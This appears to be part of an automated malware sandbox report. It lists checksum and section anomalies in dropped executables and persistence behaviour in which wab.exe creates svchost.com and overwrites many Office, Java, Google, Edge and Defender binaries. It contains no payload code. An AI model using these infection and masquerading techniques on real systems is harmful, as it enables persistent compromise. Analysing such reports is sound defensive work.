              Source: GoogleUpdateOnDemand.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2e8fe
              Source: SDXHelper.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x38c81
              Source: upx.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x5c64b
              Source: VC_redist.x64.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xaff0b
              Source: Au3Check.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x4ace1
              Source: GoogleCrashHandler.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x60b44
              Source: sscicons.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2bad0
              Source: armsvc.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x38ee8
              Source: AppVLP.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x710ec
              Source: GoogleCrashHandler64.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x739bf
              Source: Integrator.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x44ae38
              Source: Microsoft.Mashup.Container.Loader.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x218c6
              Source: AppSharingHookController.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x25428
              Source: AutoIt3Help.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2942f
              Source: Uninstall.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x1d811
              Source: officeappguardwin32.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x1ea61e
              Source: jusched.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xc76e3
              Source: AppVDllSurrogate32.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x3d892
              Source: Wordconv.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x1f925
              Source: jucheck.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x138baf
              Source: OcPubMgr.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x182a45
              Source: chrome.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x2c9d6
              Source: accicons.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x4235e8
              Source: VSTOInstaller.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x23068
              Source: misc.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x109391
              Source: ai.exe0.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xa200f
              Source: MpDlpCmd.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x74f87
              Source: java.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x5013a
              Source: SciTE.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x25609f
              Source: MpCopyAccelerator.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x3e54a
              Source: ConfigSecurityPolicy.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x8624f
              Source: integrator.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x44ae38
              Source: Aut2exe.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x1997a9
              Source: OLicenseHeartbeat.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xb8fc4
              Source: AutoIt3_x64.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x11706f
              Source: joticon.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0xbd8e2
              Source: grv_icons.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x646fd
              Source: GoogleUpdateComRegisterShell64.exe.8.dr | Static PE information: real checksum: 0x8a074 should be: 0x3898a
              Source: AppVDllSurrogate.exe.8.dr | Static PE information: section name: .didat
              Source: msoev.exe.8.dr | Static PE information: section name: .didat
              Source: OcPubMgr.exe.8.dr | Static PE information: section name: .didat
              Source: officeappguardwin32.exe.8.dr | Static PE information: section name: .didat
              Source: AppVDllSurrogate32.exe.8.dr | Static PE information: section name: .didat
              Source: OfficeScrBroker.exe.8.dr | Static PE information: section name: .didat
              Source: AppVDllSurrogate64.exe.8.dr | Static PE information: section name: .didat
              Source: OfficeScrSanBroker.exe.8.dr | Static PE information: section name: .didat
              Source: AppVLP.exe.8.dr | Static PE information: section name: .didat
              Source: Integrator.exe.8.dr | Static PE information: section name: .didat
              Source: Microsoft.Mashup.Container.Loader.exe.8.dr | Static PE information: section name: .didat
              Source: AppSharingHookController.exe.8.dr | Static PE information: section name: .didat
              Source: Common.DBConnection.exe.8.dr | Static PE information: section name: .didat
              Source: PerfBoost.exe.8.dr | Static PE information: section name: .didat
              Source: SDXHelper.exe.8.dr | Static PE information: section name: .didat
              Source: MpCmdRun.exe.8.dr | Static PE information: section name: .didat
              Source: MpDlpCmd.exe.8.dr | Static PE information: section name: .didat
              Source: mpextms.exe.8.dr | Static PE information: section name: .didat
              Source: MsMpEng.exe.8.dr | Static PE information: section name: .didat
              Source: NisSrv.exe.8.dr | Static PE information: section name: .didat
              Source: MpCmdRun.exe0.8.dr | Static PE information: section name: .didat
              Source: VC_redist.x64.exe.8.dr | Static PE information: section name: .didat
              Source: integrator.exe.8.dr | Static PE information: section name: .didat
              Source: ConfigSecurityPolicy.exe.8.dr | Static PE information: section name: .didat
              Source: MpCopyAccelerator.exe.8.dr | Static PE information: section name: .didat
              Source: UcMapi.exe.8.dr | Static PE information: section name: .didat
              Source: Wordconv.exe.8.dr | Static PE information: section name: .didat
              Source: ai.exe.8.dr | Static PE information: section name: .didat
              Source: aimgr.exe.8.dr | Static PE information: section name: .didat
              Source: chrome.exe.8.dr | Static PE information: section name: .didat
              Source: Au3Check.exe.8.dr | Static PE information: section name: .didat
              Source: Au3Info.exe.8.dr | Static PE information: section name: .didat
              Source: Au3Info_x64.exe.8.dr | Static PE information: section name: .didat
              Source: Aut2exe.exe.8.dr | Static PE information: section name: .didat
              Source: Aut2exe_x64.exe.8.dr | Static PE information: section name: .didat
              Source: upx.exe.8.dr | Static PE information: section name: .didat
              Source: AutoIt3Help.exe.8.dr | Static PE information: section name: .didat
              Source: ai.exe0.8.dr | Static PE information: section name: .didat
              Source: aimgr.exe0.8.dr | Static PE information: section name: .didat
              Source: OLicenseHeartbeat.exe.8.dr | Static PE information: section name: .didat
              Source: AppSharingHookController64.exe.8.dr | Static PE information: section name: .didat
              Source: AutoIt3_x64.exe.8.dr | Static PE information: section name: .didat
              Source: SciTE.exe.8.dr | Static PE information: section name: .didat
              Source: Uninstall.exe.8.dr | Static PE information: section name: .didat
              Source: AdobeARMHelper.exe.8.dr | Static PE information: section name: .didat
              Source: armsvc.exe.8.dr | Static PE information: section name: .didat
              Source: jaureg.exe.8.dr | Static PE information: section name: .didat
              Source: jucheck.exe.8.dr | Static PE information: section name: .didat
              Source: jusched.exe.8.dr | Static PE information: section name: .didat
              Source: VSTOInstaller.exe.8.dr | Static PE information: section name: .didat
              Source: SQLDumper.exe.8.dr | Static PE information: section name: .didat
              Source: accicons.exe.8.dr | Static PE information: section name: .didat
              Source: dbcicons.exe.8.dr | Static PE information: section name: .didat
              Source: grv_icons.exe.8.dr | Static PE information: section name: .didat
              Source: joticon.exe.8.dr | Static PE information: section name: .didat
              Source: lyncicon.exe.8.dr | Static PE information: section name: .didat
              Source: misc.exe.8.dr | Static PE information: section name: .didat
              Source: osmclienticon.exe.8.dr | Static PE information: section name: .didat
              Source: outicon.exe.8.dr | Static PE information: section name: .didat
              Source: java.exe.8.dr | Static PE information: section name: .didat
              Source: javaw.exe.8.dr | Static PE information: section name: .didat
              Source: javaws.exe.8.dr | Static PE information: section name: .didat
              Source: GoogleCrashHandler.exe.8.dr | Static PE information: section name: .didat
              Source: GoogleCrashHandler64.exe.8.dr | Static PE information: section name: .didat
              Source: GoogleUpdate.exe.8.dr | Static PE information: section name: .didat
              Source: GoogleUpdateBroker.exe.8.dr | Static PE information: section name: .didat
              Source: GoogleUpdateComRegisterShell64.exe.8.dr | Static PE information: section name: .didat
              Source: GoogleUpdateCore.exe.8.dr | Static PE information: section name: .didat
              Source: GoogleUpdateOnDemand.exe.8.dr | Static PE information: section name: .didat
              Source: pj11icon.exe.8.dr | Static PE information: section name: .didat
              Source: pptico.exe.8.dr | Static PE information: section name: .didat
              Source: pubs.exe.8.dr | Static PE information: section name: .didat
              Source: sscicons.exe.8.dr | Static PE information: section name: .didat
              Source: visicon.exe.8.dr | Static PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B8A756B push ebx; iretd 2_2_00007FFD9B8A756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B8A74FB push ebx; iretd 2_2_00007FFD9B8A756A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07B408C2 push eax; mov dword ptr [esp], ecx 5_2_07B40AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07B40AB8 push eax; mov dword ptr [esp], ecx 5_2_07B40AC4

              Persistence and Installation Behavior

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Windows\svchost.com
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
